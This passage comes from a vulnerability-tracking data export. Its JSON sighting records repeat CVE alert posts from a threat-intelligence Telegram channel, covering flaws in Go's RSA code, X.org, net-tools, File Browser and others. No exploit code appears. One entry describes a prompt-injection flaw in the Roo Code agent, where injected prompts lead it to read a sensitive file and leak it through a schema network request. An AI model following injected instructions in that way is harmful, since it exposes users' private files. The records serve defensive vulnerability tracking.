"2026-04-28T12:00:29.245057Z"}, {"uuid": "43913e49-f089-45f0-b1b2-490834d98ac5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-5crp-9r3c-p9vr", "type": "seen", "source": "https://gist.github.com/LeggoTM/5a15441057244ed0c9240dc958a9d107", "content": "", "creation_timestamp": "2026-04-29T05:03:55.000000Z"}, {"uuid": "ec3b9d95-5159-498d-9835-67e1d0b3d169", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-5crp-9r3c-p9vr", "type": "seen", "source": "https://gist.github.com/LeggoTM/031e7275da5c417cf6f2830c13f6f6e0", "content": "", "creation_timestamp": "2026-04-29T05:17:04.000000Z"}, {"uuid": "ac0d40db-e853-4e4f-b202-a00389c13b6e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-29qv-4j9f-fjw5", "type": "seen", "source": "https://gist.github.com/alon710/25629451db7d7ca933d6d9a4e21d4536", "content": "", "creation_timestamp": "2026-04-29T05:40:29.000000Z"}, {"uuid": "14576840-74af-4fb9-bbe2-920a96011085", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:2730", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/16071", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-1394\n\ud83d\udd25 CVSS Score: 7.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: A memory leak flaw was found in Golang in the RSA encrypting/decrypting code, which might lead to a resource exhaustion vulnerability using attacker-controlled inputs\u200b. The memory leak happens in github.com/golang-fips/openssl/openssl/rsa.go#L113. The objects leaked are pkey\u200b and ctx\u200b. That function uses named return parameters to free pkey\u200b and ctx\u200b if there is an error initializing the context or setting the different properties. All return statements related to error cases follow the \"return nil, nil, fail(...)\" pattern, meaning that pkey\u200b and ctx\u200b will be nil inside the deferred function that should free them.\n\ud83d\udccf Published: 2024-03-21T12:16:38.790Z\n\ud83d\udccf Modified: 2025-05-12T23:02:02.486Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:1462\n2. https://access.redhat.com/errata/RHSA-2024:1468\n3. https://access.redhat.com/errata/RHSA-2024:1472\n4. https://access.redhat.com/errata/RHSA-2024:1501\n5. https://access.redhat.com/errata/RHSA-2024:1502\n6. https://access.redhat.com/errata/RHSA-2024:1561\n7. https://access.redhat.com/errata/RHSA-2024:1563\n8. https://access.redhat.com/errata/RHSA-2024:1566\n9. https://access.redhat.com/errata/RHSA-2024:1567\n10. https://access.redhat.com/errata/RHSA-2024:1574\n11. https://access.redhat.com/errata/RHSA-2024:1640\n12. https://access.redhat.com/errata/RHSA-2024:1644\n13. https://access.redhat.com/errata/RHSA-2024:1646\n14. https://access.redhat.com/errata/RHSA-2024:1763\n15. https://access.redhat.com/errata/RHSA-2024:1897\n16. https://access.redhat.com/errata/RHSA-2024:2562\n17. https://access.redhat.com/errata/RHSA-2024:2568\n18. https://access.redhat.com/errata/RHSA-2024:2569\n19. https://access.redhat.com/errata/RHSA-2024:2729\n20. https://access.redhat.com/errata/RHSA-2024:2730\n21. https://access.redhat.com/errata/RHSA-2024:2767\n22. https://access.redhat.com/errata/RHSA-2024:3265\n23. https://access.redhat.com/errata/RHSA-2024:3352\n24. https://access.redhat.com/errata/RHSA-2024:4146\n25. https://access.redhat.com/errata/RHSA-2024:4371\n26. https://access.redhat.com/errata/RHSA-2024:4378\n27. https://access.redhat.com/errata/RHSA-2024:4379\n28. https://access.redhat.com/errata/RHSA-2024:4502\n29. https://access.redhat.com/errata/RHSA-2024:4581\n30. https://access.redhat.com/errata/RHSA-2024:4591\n31. https://access.redhat.com/errata/RHSA-2024:4672\n32. https://access.redhat.com/errata/RHSA-2024:4699\n33. https://access.redhat.com/errata/RHSA-2024:4761\n34. https://access.redhat.com/errata/RHSA-2024:4762\n35. https://access.redhat.com/errata/RHSA-2024:4960\n36. https://access.redhat.com/errata/RHSA-2024:5258\n37. https://access.redhat.com/errata/RHSA-2024:5634\n38. https://access.redhat.com/errata/RHSA-2024:7262\n39. https://access.redhat.com/security/cve/CVE-2024-1394\n40. https://bugzilla.redhat.com/show_bug.cgi?id=2262921\n41. https://github.com/golang-fips/openssl/commit/85d31d0d257ce842c8a1e63c4d230ae850348136\n42. https://github.com/golang-fips/openssl/security/advisories/GHSA-78hx-gp6g-7mj6\n43. https://github.com/microsoft/go-crypto-openssl/commit/104fe7f6912788d2ad44602f77a0a0a62f1f259f\n44. https://pkg.go.dev/vuln/GO-2024-2660\n45. https://vuln.go.dev/ID/GO-2024-2660.json", "creation_timestamp": "2025-05-12T23:29:31.000000Z"}, {"uuid": "41ebf362-f70f-4ab7-9ecf-f182404733db", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:7262", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/16071", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-1394\n\ud83d\udd25 CVSS Score: 7.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: A memory leak flaw was found in Golang in the RSA encrypting/decrypting code, which might lead to a resource exhaustion vulnerability using attacker-controlled inputs\u200b. The memory leak happens in github.com/golang-fips/openssl/openssl/rsa.go#L113. The objects leaked are pkey\u200b and ctx\u200b. That function uses named return parameters to free pkey\u200b and ctx\u200b if there is an error initializing the context or setting the different properties. All return statements related to error cases follow the \"return nil, nil, fail(...)\" pattern, meaning that pkey\u200b and ctx\u200b will be nil inside the deferred function that should free them.\n\ud83d\udccf Published: 2024-03-21T12:16:38.790Z\n\ud83d\udccf Modified: 2025-05-12T23:02:02.486Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:1462\n2. https://access.redhat.com/errata/RHSA-2024:1468\n3. https://access.redhat.com/errata/RHSA-2024:1472\n4. https://access.redhat.com/errata/RHSA-2024:1501\n5. https://access.redhat.com/errata/RHSA-2024:1502\n6. https://access.redhat.com/errata/RHSA-2024:1561\n7. https://access.redhat.com/errata/RHSA-2024:1563\n8. https://access.redhat.com/errata/RHSA-2024:1566\n9. https://access.redhat.com/errata/RHSA-2024:1567\n10. https://access.redhat.com/errata/RHSA-2024:1574\n11. https://access.redhat.com/errata/RHSA-2024:1640\n12. https://access.redhat.com/errata/RHSA-2024:1644\n13. https://access.redhat.com/errata/RHSA-2024:1646\n14. https://access.redhat.com/errata/RHSA-2024:1763\n15. https://access.redhat.com/errata/RHSA-2024:1897\n16. https://access.redhat.com/errata/RHSA-2024:2562\n17. https://access.redhat.com/errata/RHSA-2024:2568\n18. https://access.redhat.com/errata/RHSA-2024:2569\n19. https://access.redhat.com/errata/RHSA-2024:2729\n20. https://access.redhat.com/errata/RHSA-2024:2730\n21. https://access.redhat.com/errata/RHSA-2024:2767\n22. https://access.redhat.com/errata/RHSA-2024:3265\n23. https://access.redhat.com/errata/RHSA-2024:3352\n24. https://access.redhat.com/errata/RHSA-2024:4146\n25. https://access.redhat.com/errata/RHSA-2024:4371\n26. https://access.redhat.com/errata/RHSA-2024:4378\n27. https://access.redhat.com/errata/RHSA-2024:4379\n28. https://access.redhat.com/errata/RHSA-2024:4502\n29. https://access.redhat.com/errata/RHSA-2024:4581\n30. https://access.redhat.com/errata/RHSA-2024:4591\n31. https://access.redhat.com/errata/RHSA-2024:4672\n32. https://access.redhat.com/errata/RHSA-2024:4699\n33. https://access.redhat.com/errata/RHSA-2024:4761\n34. https://access.redhat.com/errata/RHSA-2024:4762\n35. https://access.redhat.com/errata/RHSA-2024:4960\n36. https://access.redhat.com/errata/RHSA-2024:5258\n37. https://access.redhat.com/errata/RHSA-2024:5634\n38. https://access.redhat.com/errata/RHSA-2024:7262\n39. https://access.redhat.com/security/cve/CVE-2024-1394\n40. https://bugzilla.redhat.com/show_bug.cgi?id=2262921\n41. https://github.com/golang-fips/openssl/commit/85d31d0d257ce842c8a1e63c4d230ae850348136\n42. https://github.com/golang-fips/openssl/security/advisories/GHSA-78hx-gp6g-7mj6\n43. https://github.com/microsoft/go-crypto-openssl/commit/104fe7f6912788d2ad44602f77a0a0a62f1f259f\n44. https://pkg.go.dev/vuln/GO-2024-2660\n45. https://vuln.go.dev/ID/GO-2024-2660.json", "creation_timestamp": "2025-05-12T23:29:31.000000Z"}, {"uuid": "96527c51-40ff-47dc-8627-fbe87441954a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:1574", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/16071", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-1394\n\ud83d\udd25 CVSS Score: 7.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: A memory leak flaw was found in Golang in the RSA encrypting/decrypting code, which might lead to a resource exhaustion vulnerability using attacker-controlled inputs\u200b. The memory leak happens in github.com/golang-fips/openssl/openssl/rsa.go#L113. The objects leaked are pkey\u200b and ctx\u200b. That function uses named return parameters to free pkey\u200b and ctx\u200b if there is an error initializing the context or setting the different properties. All return statements related to error cases follow the \"return nil, nil, fail(...)\" pattern, meaning that pkey\u200b and ctx\u200b will be nil inside the deferred function that should free them.\n\ud83d\udccf Published: 2024-03-21T12:16:38.790Z\n\ud83d\udccf Modified: 2025-05-12T23:02:02.486Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:1462\n2. https://access.redhat.com/errata/RHSA-2024:1468\n3. https://access.redhat.com/errata/RHSA-2024:1472\n4. https://access.redhat.com/errata/RHSA-2024:1501\n5. https://access.redhat.com/errata/RHSA-2024:1502\n6. https://access.redhat.com/errata/RHSA-2024:1561\n7. https://access.redhat.com/errata/RHSA-2024:1563\n8. https://access.redhat.com/errata/RHSA-2024:1566\n9. https://access.redhat.com/errata/RHSA-2024:1567\n10. https://access.redhat.com/errata/RHSA-2024:1574\n11. https://access.redhat.com/errata/RHSA-2024:1640\n12. https://access.redhat.com/errata/RHSA-2024:1644\n13. https://access.redhat.com/errata/RHSA-2024:1646\n14. https://access.redhat.com/errata/RHSA-2024:1763\n15. https://access.redhat.com/errata/RHSA-2024:1897\n16. https://access.redhat.com/errata/RHSA-2024:2562\n17. https://access.redhat.com/errata/RHSA-2024:2568\n18. https://access.redhat.com/errata/RHSA-2024:2569\n19. https://access.redhat.com/errata/RHSA-2024:2729\n20. https://access.redhat.com/errata/RHSA-2024:2730\n21. https://access.redhat.com/errata/RHSA-2024:2767\n22. https://access.redhat.com/errata/RHSA-2024:3265\n23. https://access.redhat.com/errata/RHSA-2024:3352\n24. https://access.redhat.com/errata/RHSA-2024:4146\n25. https://access.redhat.com/errata/RHSA-2024:4371\n26. https://access.redhat.com/errata/RHSA-2024:4378\n27. https://access.redhat.com/errata/RHSA-2024:4379\n28. https://access.redhat.com/errata/RHSA-2024:4502\n29. https://access.redhat.com/errata/RHSA-2024:4581\n30. https://access.redhat.com/errata/RHSA-2024:4591\n31. https://access.redhat.com/errata/RHSA-2024:4672\n32. https://access.redhat.com/errata/RHSA-2024:4699\n33. https://access.redhat.com/errata/RHSA-2024:4761\n34. https://access.redhat.com/errata/RHSA-2024:4762\n35. https://access.redhat.com/errata/RHSA-2024:4960\n36. https://access.redhat.com/errata/RHSA-2024:5258\n37. https://access.redhat.com/errata/RHSA-2024:5634\n38. https://access.redhat.com/errata/RHSA-2024:7262\n39. https://access.redhat.com/security/cve/CVE-2024-1394\n40. https://bugzilla.redhat.com/show_bug.cgi?id=2262921\n41. https://github.com/golang-fips/openssl/commit/85d31d0d257ce842c8a1e63c4d230ae850348136\n42. https://github.com/golang-fips/openssl/security/advisories/GHSA-78hx-gp6g-7mj6\n43. https://github.com/microsoft/go-crypto-openssl/commit/104fe7f6912788d2ad44602f77a0a0a62f1f259f\n44. https://pkg.go.dev/vuln/GO-2024-2660\n45. https://vuln.go.dev/ID/GO-2024-2660.json", "creation_timestamp": "2025-05-12T23:29:31.000000Z"}, {"uuid": "a319348d-5fdd-43e6-a734-8180e9509ce3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:4761", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/16071", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-1394\n\ud83d\udd25 CVSS Score: 7.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: A memory leak flaw was found in Golang in the RSA encrypting/decrypting code, which might lead to a resource exhaustion vulnerability using attacker-controlled inputs\u200b. The memory leak happens in github.com/golang-fips/openssl/openssl/rsa.go#L113. The objects leaked are pkey\u200b and ctx\u200b. That function uses named return parameters to free pkey\u200b and ctx\u200b if there is an error initializing the context or setting the different properties. All return statements related to error cases follow the \"return nil, nil, fail(...)\" pattern, meaning that pkey\u200b and ctx\u200b will be nil inside the deferred function that should free them.\n\ud83d\udccf Published: 2024-03-21T12:16:38.790Z\n\ud83d\udccf Modified: 2025-05-12T23:02:02.486Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:1462\n2. https://access.redhat.com/errata/RHSA-2024:1468\n3. https://access.redhat.com/errata/RHSA-2024:1472\n4. https://access.redhat.com/errata/RHSA-2024:1501\n5. https://access.redhat.com/errata/RHSA-2024:1502\n6. https://access.redhat.com/errata/RHSA-2024:1561\n7. https://access.redhat.com/errata/RHSA-2024:1563\n8. https://access.redhat.com/errata/RHSA-2024:1566\n9. https://access.redhat.com/errata/RHSA-2024:1567\n10. https://access.redhat.com/errata/RHSA-2024:1574\n11. https://access.redhat.com/errata/RHSA-2024:1640\n12. https://access.redhat.com/errata/RHSA-2024:1644\n13. https://access.redhat.com/errata/RHSA-2024:1646\n14. https://access.redhat.com/errata/RHSA-2024:1763\n15. https://access.redhat.com/errata/RHSA-2024:1897\n16. https://access.redhat.com/errata/RHSA-2024:2562\n17. https://access.redhat.com/errata/RHSA-2024:2568\n18. https://access.redhat.com/errata/RHSA-2024:2569\n19. https://access.redhat.com/errata/RHSA-2024:2729\n20. https://access.redhat.com/errata/RHSA-2024:2730\n21. https://access.redhat.com/errata/RHSA-2024:2767\n22. https://access.redhat.com/errata/RHSA-2024:3265\n23. https://access.redhat.com/errata/RHSA-2024:3352\n24. https://access.redhat.com/errata/RHSA-2024:4146\n25. https://access.redhat.com/errata/RHSA-2024:4371\n26. https://access.redhat.com/errata/RHSA-2024:4378\n27. https://access.redhat.com/errata/RHSA-2024:4379\n28. https://access.redhat.com/errata/RHSA-2024:4502\n29. https://access.redhat.com/errata/RHSA-2024:4581\n30. https://access.redhat.com/errata/RHSA-2024:4591\n31. https://access.redhat.com/errata/RHSA-2024:4672\n32. https://access.redhat.com/errata/RHSA-2024:4699\n33. https://access.redhat.com/errata/RHSA-2024:4761\n34. https://access.redhat.com/errata/RHSA-2024:4762\n35. https://access.redhat.com/errata/RHSA-2024:4960\n36. https://access.redhat.com/errata/RHSA-2024:5258\n37. https://access.redhat.com/errata/RHSA-2024:5634\n38. https://access.redhat.com/errata/RHSA-2024:7262\n39. https://access.redhat.com/security/cve/CVE-2024-1394\n40. https://bugzilla.redhat.com/show_bug.cgi?id=2262921\n41. https://github.com/golang-fips/openssl/commit/85d31d0d257ce842c8a1e63c4d230ae850348136\n42. https://github.com/golang-fips/openssl/security/advisories/GHSA-78hx-gp6g-7mj6\n43. https://github.com/microsoft/go-crypto-openssl/commit/104fe7f6912788d2ad44602f77a0a0a62f1f259f\n44. https://pkg.go.dev/vuln/GO-2024-2660\n45. https://vuln.go.dev/ID/GO-2024-2660.json", "creation_timestamp": "2025-05-12T23:29:31.000000Z"}, {"uuid": "1a1bfe84-f68f-4824-9a5d-e154b18b3de9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:9816", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/16122", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-9632\n\ud83d\udd25 CVSS Score: 7.8 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: A flaw was found in the X.org server. Due to improperly tracked allocation size in _XkbSetCompatMap, a local attacker may be able to trigger a buffer overflow condition via a specially crafted payload, leading to denial of service or local privilege escalation in distributions where the X.org server is run with root privileges.\n\ud83d\udccf Published: 2024-10-30T07:42:35.320Z\n\ud83d\udccf Modified: 2025-05-13T14:17:46.279Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:10090\n2. https://access.redhat.com/errata/RHSA-2024:8798\n3. https://access.redhat.com/errata/RHSA-2024:9540\n4. https://access.redhat.com/errata/RHSA-2024:9579\n5. https://access.redhat.com/errata/RHSA-2024:9601\n6. https://access.redhat.com/errata/RHSA-2024:9690\n7. https://access.redhat.com/errata/RHSA-2024:9816\n8. https://access.redhat.com/errata/RHSA-2024:9818\n9. https://access.redhat.com/errata/RHSA-2024:9819\n10. https://access.redhat.com/errata/RHSA-2024:9820\n11. https://access.redhat.com/errata/RHSA-2024:9901\n12. https://access.redhat.com/errata/RHSA-2025:7163\n13. https://access.redhat.com/errata/RHSA-2025:7165\n14. https://access.redhat.com/security/cve/CVE-2024-9632\n15. https://bugzilla.redhat.com/show_bug.cgi?id=2317233", "creation_timestamp": "2025-05-13T14:30:42.000000Z"}, {"uuid": "93882099-2e4b-45f0-82b3-1be0fa021ac6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-84XV-JFRM-H4GM", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/16070", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-1485\n\ud83d\udd25 CVSS Score: 8 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:N/I:H/A:H)\n\ud83d\udd39 Description: A flaw was found in the decompression function of registry-support. This issue can be triggered if an unauthenticated remote attacker tricks a user into parsing a devfile which uses the `parent` or `plugin` keywords. This could download a malicious archive and cause the cleanup process to overwrite or delete files outside of the archive, which should not be allowed.\n\ud83d\udccf Published: 2024-02-13T23:31:14.427Z\n\ud83d\udccf Modified: 2025-05-12T23:04:53.608Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/security/cve/CVE-2024-1485\n2. https://bugzilla.redhat.com/show_bug.cgi?id=2264106\n3. https://github.com/advisories/GHSA-84xv-jfrm-h4gm\n4. https://github.com/devfile/registry-support/commit/0e44b9ca6d03fac4fc3f77d37656d56dc5defe0d\n5. https://github.com/devfile/registry-support/pull/197", "creation_timestamp": "2025-05-12T23:29:29.000000Z"}, {"uuid": "b4d60e80-ac97-407d-8515-5f0157588728", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:4378", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/16071", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-1394\n\ud83d\udd25 CVSS Score: 7.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: A memory leak flaw was found in Golang in the RSA encrypting/decrypting code, which might lead to a resource exhaustion vulnerability using attacker-controlled inputs\u200b. The memory leak happens in github.com/golang-fips/openssl/openssl/rsa.go#L113. The objects leaked are pkey\u200b and ctx\u200b. That function uses named return parameters to free pkey\u200b and ctx\u200b if there is an error initializing the context or setting the different properties. All return statements related to error cases follow the \"return nil, nil, fail(...)\" pattern, meaning that pkey\u200b and ctx\u200b will be nil inside the deferred function that should free them.\n\ud83d\udccf Published: 2024-03-21T12:16:38.790Z\n\ud83d\udccf Modified: 2025-05-12T23:02:02.486Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:1462\n2. https://access.redhat.com/errata/RHSA-2024:1468\n3. https://access.redhat.com/errata/RHSA-2024:1472\n4. https://access.redhat.com/errata/RHSA-2024:1501\n5. https://access.redhat.com/errata/RHSA-2024:1502\n6. https://access.redhat.com/errata/RHSA-2024:1561\n7. https://access.redhat.com/errata/RHSA-2024:1563\n8. https://access.redhat.com/errata/RHSA-2024:1566\n9. https://access.redhat.com/errata/RHSA-2024:1567\n10. https://access.redhat.com/errata/RHSA-2024:1574\n11. https://access.redhat.com/errata/RHSA-2024:1640\n12. https://access.redhat.com/errata/RHSA-2024:1644\n13. https://access.redhat.com/errata/RHSA-2024:1646\n14. https://access.redhat.com/errata/RHSA-2024:1763\n15. https://access.redhat.com/errata/RHSA-2024:1897\n16. https://access.redhat.com/errata/RHSA-2024:2562\n17. https://access.redhat.com/errata/RHSA-2024:2568\n18. https://access.redhat.com/errata/RHSA-2024:2569\n19. https://access.redhat.com/errata/RHSA-2024:2729\n20. https://access.redhat.com/errata/RHSA-2024:2730\n21. https://access.redhat.com/errata/RHSA-2024:2767\n22. https://access.redhat.com/errata/RHSA-2024:3265\n23. https://access.redhat.com/errata/RHSA-2024:3352\n24. https://access.redhat.com/errata/RHSA-2024:4146\n25. https://access.redhat.com/errata/RHSA-2024:4371\n26. https://access.redhat.com/errata/RHSA-2024:4378\n27. https://access.redhat.com/errata/RHSA-2024:4379\n28. https://access.redhat.com/errata/RHSA-2024:4502\n29. https://access.redhat.com/errata/RHSA-2024:4581\n30. https://access.redhat.com/errata/RHSA-2024:4591\n31. https://access.redhat.com/errata/RHSA-2024:4672\n32. https://access.redhat.com/errata/RHSA-2024:4699\n33. https://access.redhat.com/errata/RHSA-2024:4761\n34. https://access.redhat.com/errata/RHSA-2024:4762\n35. https://access.redhat.com/errata/RHSA-2024:4960\n36. https://access.redhat.com/errata/RHSA-2024:5258\n37. https://access.redhat.com/errata/RHSA-2024:5634\n38. https://access.redhat.com/errata/RHSA-2024:7262\n39. https://access.redhat.com/security/cve/CVE-2024-1394\n40. https://bugzilla.redhat.com/show_bug.cgi?id=2262921\n41. https://github.com/golang-fips/openssl/commit/85d31d0d257ce842c8a1e63c4d230ae850348136\n42. https://github.com/golang-fips/openssl/security/advisories/GHSA-78hx-gp6g-7mj6\n43. https://github.com/microsoft/go-crypto-openssl/commit/104fe7f6912788d2ad44602f77a0a0a62f1f259f\n44. https://pkg.go.dev/vuln/GO-2024-2660\n45. https://vuln.go.dev/ID/GO-2024-2660.json", "creation_timestamp": "2025-05-12T23:29:31.000000Z"}, {"uuid": "007745e5-9ee9-4042-aa5b-bb9ec7e44c0c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-WR2Q-46PG-F228", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/19792", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-53097\n\ud83d\udd25 CVSS Score: 5.9 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N)\n\ud83d\udd39 Description: Roo Code is an AI-powered autonomous coding agent. Prior to version 3.20.3, there was an issue where the Roo Code agent's `search_files` tool did not respect the setting to disable reads outside of the VS Code workspace. This means that an attacker who was able to inject a prompt into the agent could potentially read a sensitive file and then write the information to a JSON schema. Users have the option to disable schema fetching in VS Code, but the feature is enabled by default. For users with this feature enabled, writing to the schema would trigger a network request without the user having a chance to deny. This issue is of moderate severity, since it requires the attacker to already be able to submit prompts to the agent. Version 3.20.3 fixed the issue where `search_files` did not respect the setting to limit it to the workspace. This reduces the scope of the damage if an attacker is able to take control of the agent through prompt injection or another vector.\n\ud83d\udccf Published: 2025-06-27T21:43:31.678Z\n\ud83d\udccf Modified: 2025-06-27T21:43:31.678Z\n\ud83d\udd17 References:\n1. https://github.com/RooCodeInc/Roo-Code/security/advisories/GHSA-wr2q-46pg-f228\n2. https://github.com/RooCodeInc/Roo-Code/commit/10b2fb32ed047bbd7b8d10ef185c1ed345efcc92\n3. https://github.com/RooCodeInc/Roo-Code/commit/7d0b22f9e659dc6c26aab0bacbea27874986e772", "creation_timestamp": "2025-06-27T21:55:03.000000Z"}, {"uuid": "c0a22b10-1fc1-454b-870e-606d3a6c44ba", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9XWC-HFWC-8W59", "type": "seen", "source": "Telegram/X69Hoh6_4i7djUBejuAQijXCf66Jnc_uFnYRKez2YtZF33U", "content": "", "creation_timestamp": "2026-04-14T17:27:49.000000Z"}, {"uuid": "185bcfaf-6e42-4693-ae82-0f93fc57370f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-PFWF-H6M3-63WF", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/16434", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-46836\n\ud83d\udd25 CVSS Score: 6.6 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:H)\n\ud83d\udd39 Description: net-tools is a collection of programs that form the base set of the NET-3 networking distribution for the Linux operating system. Inn versions up to and including 2.10, the Linux network utilities (like ifconfig) from the net-tools package do not properly validate the structure of /proc files when showing interfaces. `get_name()` in `interface.c` copies interface labels from `/proc/net/dev` into a fixed 16-byte stack buffer without bounds checking, leading to possible arbitrary code execution or crash. The known attack path does not require privilege but also does not provide privilege escalation in this scenario. A patch is available and expected to be part of version 2.20.\n\ud83d\udccf Published: 2025-05-14T22:59:19.997Z\n\ud83d\udccf Modified: 2025-05-14T22:59:19.997Z\n\ud83d\udd17 References:\n1. https://github.com/ecki/net-tools/security/advisories/GHSA-pfwf-h6m3-63wf\n2. https://github.com/ecki/net-tools/commit/7a8f42fb20013a1493d8cae1c43436f85e656f2d", "creation_timestamp": "2025-05-14T23:33:27.000000Z"}, {"uuid": "2accfbdf-ac70-4e5c-93aa-00b4d3af7227", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3Q2W-42MV-CPH4", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/19648", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-52903\n\ud83d\udd25 CVSS Score: 8.1 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H)\n\ud83d\udd39 Description: File Browser provides a file managing interface within a specified directory and it can be used to upload, delete, preview, rename and edit files. In version 2.32.0, the Command Execution feature of File Browser only allows the execution of shell command which have been predefined on a user-specific allowlist. Many tools allow the execution of arbitrary different commands, rendering this limitation void. The concrete impact depends on the commands being granted to the attacker, but the large number of standard commands allowing the execution of subcommands makes it likely that every user having the `Execute commands` permissions can exploit this vulnerability. Everyone who can exploit it will have full code execution rights with the uid of the server process. Until this issue is fixed, the maintainers recommend to completely disable `Execute commands` for all accounts. Since the command execution is an inherently dangerous feature that is not used by all deployments, it should be possible to completely disable it in the application's configuration. As a defense-in-depth measure, organizations not requiring command execution should operate the Filebrowser from a distroless container image. A patch version has been pushed to disable the feature for all existent installations, and making it opt-in. A warning has been added to the documentation and is printed on the console if the feature is enabled. Due to the project being in maintenance-only mode, the bug has not been fixed. The fix is tracked on pull request 5199.\n\ud83d\udccf Published: 2025-06-26T18:16:32.203Z\n\ud83d\udccf Modified: 2025-06-26T19:32:27.851Z\n\ud83d\udd17 References:\n1. https://github.com/filebrowser/filebrowser/security/advisories/GHSA-3q2w-42mv-cph4\n2. https://github.com/filebrowser/filebrowser/issues/5199\n3. https://github.com/GoogleContainerTools/distroless\n4. https://manpages.debian.org/bookworm/util-linux/prlimit.1.en.html", "creation_timestamp": "2025-06-26T19:50:48.000000Z"}, {"uuid": 